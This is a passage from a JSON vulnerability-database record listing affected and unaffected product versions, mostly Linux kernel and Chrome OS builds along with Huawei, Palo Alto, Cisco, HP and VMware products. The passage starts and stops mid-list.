        "vendor": "google",
        "version": "26.0.1410.1"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.3.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.15"
      },
      {
        "model": "security guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.79"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.74"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.131.0"
      },
      {
        "model": "edge digital media player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3000"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.7"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2.4.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.63"
      },
      {
        "model": "ar3200 v200r007c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.6"
      },
      {
        "model": "cloudengine v100r003c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "12800"
      },
      {
        "model": "cloudengine v200r001sph002",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "12800"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.13"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "vds-tv caching nodes",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.5"
      },
      {
        "model": "helion openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.19"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.20"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.55"
      },
      {
        "model": "openstack cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.72"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.12"
      },
      {
        "model": "helion openstack",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.0.1"
      },
      {
        "model": "ar3200 v200r006c10",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "series digital media players",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "43000"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.16"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.82"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.38"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.55"
      },
      {
        "model": "linux enterprise server sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.37.2"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.90"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.52"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.8.3"
      },
      {
        "model": "linux",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1185.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1.8"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5(.1.6)"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.0"
      },
      {
        "model": "kernel 3.14-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.11"
      },
      {
        "model": "kernel 4.3-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.126.0"
      },
      {
        "model": "kernel 4.1-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.3"
      },
      {
        "model": "cloudengine v100r005c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "12800"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.5"
      },
      {
        "model": "propel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.01"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.1"
      },
      {
        "model": "server bare metal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "virtuozzo",
        "version": "5.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.159"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.68"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.20"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.34"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.24"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.30"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.93"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.38"
      },
      {
        "model": "prime collaboration provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.50"
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "5"
      },
      {
        "model": "nexus series fabric switches aci mode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9000-0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.84"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.86"
      },
      {
        "model": "cloudengine v100r006c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "7800"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.173"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.34"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.7"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1185.1"
      },
      {
        "model": "manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.45"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.44"
      },
      {
        "model": "helion openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.7"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.37"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "3.1.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.54"
      },
      {
        "model": "5130hi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "linux enterprise debuginfo sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "propel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.10"
      },
      {
        "model": "helion cloudsystem",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.2"
      },
      {
        "model": "nexus player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.20"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.126"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.78"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.9"
      },
      {
        "model": "pixel c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.26"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.21"
      },
      {
        "model": "cloud object storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19.3"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.4"
      },
      {
        "model": "junos space 14.1r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.6"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.2"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.7"
      },
      {
        "model": "kernel 4.1-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.18"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.118"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.75"
      },
      {
        "model": "linux enterprise live patching",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.15"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.44"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.70"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.72"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.87"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.81"
      },
      {
        "model": "pan-os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.17"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.92"
      },
      {
        "model": "application policy infrastructure controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.37"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.10"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "19507)0"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "125007)0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.36"
      },
      {
        "model": "helion cloudsystem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.0.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.86"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.47"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.85"
      },
      {
        "model": "ar3200 v200r006c16",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.0"
      },
      {
        "model": "kernel 3.11-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "40.0.2214.114"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "helion openstack",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.0.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "53.0.2785.103"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.42"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.51"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.56"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.343"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.17"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.26"
      },
      {
        "model": "webex meetings server 2.5mr2",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "cloudengine v100r003c10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "6800"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.42"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.7"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "52.0.2743.85"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.125"
      },
      {
        "model": "cloudengine v100r002c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "6800"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.11"
      },
      {
        "model": "vrealize operations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2.1"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.400"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "1.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19"
      },
      {
        "model": "kernel 3.17-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59407)0"
      },
      {
        "model": "prime service catalog virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "propel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.22"
      },
      {
        "model": "pixel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "48.0.2564.92"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.14"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.52"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.18"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1180.0"
      },
      {
        "model": "prime data center network manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "cloudengine v200r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "6800"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364160"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
